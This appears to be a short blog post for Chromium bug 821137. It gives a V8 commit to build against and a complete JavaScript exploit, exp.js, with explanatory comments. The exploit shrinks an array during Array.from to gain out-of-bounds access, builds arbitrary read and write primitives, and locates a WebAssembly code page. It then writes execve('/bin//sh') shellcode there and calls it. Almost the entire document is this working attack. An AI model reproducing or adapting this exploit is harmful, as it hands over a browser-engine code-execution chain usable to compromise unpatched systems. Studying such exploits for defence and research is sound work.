crbug-821137

Posted on Aug 14, 2020

v8 build version

git reset --hard 1dab065bb4025bdd663ba12e2e976c34c3fa6599

exp.js

// Eight bytes of scratch space viewed two ways: as one double and as the
// two unsigned 32-bit words that make it up. d2u and u2d below write
// through one view and read through the other to convert between them.
const f64 = new Float64Array(1);
const u32 = new Uint32Array(f64.buffer);
// Reinterpret the double `v` as two unsigned 32-bit words.
// Writes `v` into the shared scratch buffer and returns the Uint32Array
// view over it. The return value is the shared view itself, so a later
// d2u/u2d call overwrites its contents; read what you need immediately.
function d2u(v) {
    f64.fill(v);
    return u32;
}
// Assemble a double from two 32-bit words: `lo` becomes word 0 and `hi`
// word 1 of the shared scratch buffer; the double read back from that
// buffer is returned. Inverse of d2u.
function u2d(lo, hi) {
    u32.set([lo, hi]);
    return f64[0];
}
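// Format a 64-bit value given as two 32-bit words as a "0x…" hex string.
//
// lo: low 32-bit word, hi: high 32-bit word (non-negative integers below
// 2^32, i.e. what d2u yields). Returns the combined value in hex.
//
// The low word is zero-padded to eight hex digits: the previous
// `hi.toString(16) + lo.toString(16)` produced "0x15" for hi=1, lo=5,
// which is indistinguishable from the value 0x15. When hi is zero the
// value fits in the low word and is printed without padding.
// (Not referenced elsewhere in this script.)
function hex(lo, hi) {
    if (hi === 0) {
        return `0x${lo.toString(16)}`;
    }
    // slice(-8) keeps the last eight characters after left-padding with zeros.
    const low = ("00000000" + lo.toString(16)).slice(-8);
    return `0x${hi.toString(16)}${low}`;
}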
// Raw bytes of a small WebAssembly module (magic "\0asm", version 1). Its
// export section names two exports, "memory" and "main"; the single code
// body is `i32.const 42` followed by `end`, so main() returns 42.
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,
    1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,
    131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,
    109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
// Compile and instantiate synchronously; the module declares no imports.
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
// The exported main function. The iterator below stores it in an object
// carrying the 0xdadb marker that the second scan looks for, and the script
// calls it once as its final statement.
var jit = wasm_instance.exports.main;
// Arrays filled in by the Array.from call below: oobArray is handed back by
// its constructor argument and is the array it populates; bufArray and
// objArray each receive one element on the iterator's final step.
const oobArray = [1.1];
const bufArray = [];
const objArray = [];
// Drive Array.from with a constructor that returns the existing oobArray
// instead of a fresh array, and an iterable whose iterator yields the
// integers 0 .. max-1. On the call after the last value, the iterator
// truncates oobArray to length 1 and allocates an ArrayBuffer and a plain
// object (holding the wasm export) before reporting done.
// NOTE(review): the name oobArray suggests this shrink-during-iteration is
// the trigger for the bug the page is titled after; that cannot be
// confirmed from this file alone.
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
    {
        counter : 0,
        max : 1024 * 8,
        next()
        {
            var result = this.counter++;
            if (this.counter > this.max)
            {
                // Final step: shrink the target array, then allocate the two
                // objects whose marker values (0x1337 and 0xdadb) the scans
                // further down search for.
                oobArray.length = 1;
                bufArray.push(new ArrayBuffer(0x1337));
                objArray.push({'a': 0xdadb, 'b': jit});
                return {done: true};
            }
            else
            {
                return {value: result, done: false};
            }
        }
    }
) });
// Sixteen throw-away allocations of 0x1000000-element arrays; nothing
// reads them. Presumably intended to provoke garbage collection before the
// scans start — not verifiable from this file.
for (let round = 0; round < 0x10; round++) {
    new Array(0x1000000);
}
// Indices into oobArray located by the two scans that follow. Both start
// at 0 and are overwritten when the corresponding marker value is found.
let buf_off = 0;
let jit_off = 0;
// Walk oobArray upwards from index 0, splitting each element into 32-bit
// words, until the high word equals 0x1337 (the ArrayBuffer length used in
// the iterator above); buf_off is set to three indices before that hit.
// The loop has no upper bound, so it does not terminate if no element
// ever matches.
for (var i=0; ; i++)
{
    var tmp = d2u(oobArray[i]);
    if (tmp[1]==0x1337)
    {
        buf_off = i-3;
        break;
    }
}
// Same scan for the 0xdadb marker (property 'a' of the object pushed in the
// iterator); jit_off is set to the index just after the hit. Also unbounded.
for (var i=0; ; i++)
{
    var tmp = d2u(oobArray[i]);
    if (tmp[1]==0xdadb)
    {
        jit_off = i+1;
        break;
    }
}
// Store `addr` (a double) into oobArray at index buf_off+4, then view the
// ArrayBuffer allocated in the iterator (bufArray[0]) as sixteen doubles and
// return the first of them.
// NOTE(review): the name suggests the store into oobArray changes where
// bufArray[0]'s contents are read from; that depends on the engine's heap
// layout and is not verifiable from this file. Callers split the returned
// double with d2u.
function aar(addr) {
    oobArray[buf_off+4] = addr;
    var arr = new Float64Array(bufArray[0], 0, 0x10);
    return arr[0]
}
// Counterpart of aar: store `addr` into oobArray at index buf_off+4, then
// write the single byte `data` to index 0 of a Uint8Array view over
// bufArray[0]. Returns nothing.
// NOTE(review): as with aar, the effect relies on the store into oobArray
// redirecting bufArray[0]; not verifiable here.
function aaw(addr, data) {
    oobArray[buf_off+4] = addr;
    var arr = new Uint8Array(bufArray[0]);
    arr[0] = data;
}
// Element at the index recorded by the second scan, read back as a double.
var jsfunction = oobArray[jit_off];
// Three chained reads via aar. Each splits the previous result with d2u,
// rewrites the low word as (low - 1 + offset) while keeping the high word,
// and reads a double from there. The offsets 0x18, 0x8 and 0x72 are fixed
// constants tied to the V8 revision pinned at the top of the page; nothing
// here derives them at runtime, so they are not expected to hold elsewhere.
var wasm1 = aar(u2d(d2u(jsfunction)[0]-1+0x18, d2u(jsfunction)[1]));
var wasm2 = aar(u2d(d2u(wasm1)[0]-1+0x8, d2u(wasm1)[1]));
var jitaddr = aar(u2d(d2u(wasm2)[0]-1+0x72, d2u(wasm2)[1]));
// Byte sequence copied below, one byte per aaw call, to consecutive
// low-word addresses starting at jitaddr.
var sc = [0x31, 0xf6, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x56, 0x53, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x31, 0xd2, 0x0f, 0x05];
for (var i=0; i<sc.length; i++)
{
    // Address for byte i: jitaddr with i added to its low word only.
    var addr = u2d(d2u(jitaddr)[0]+i, d2u(jitaddr)[1]);
    aaw(addr, sc[i]);
}
// Call the wasm export after the writes above.
jit();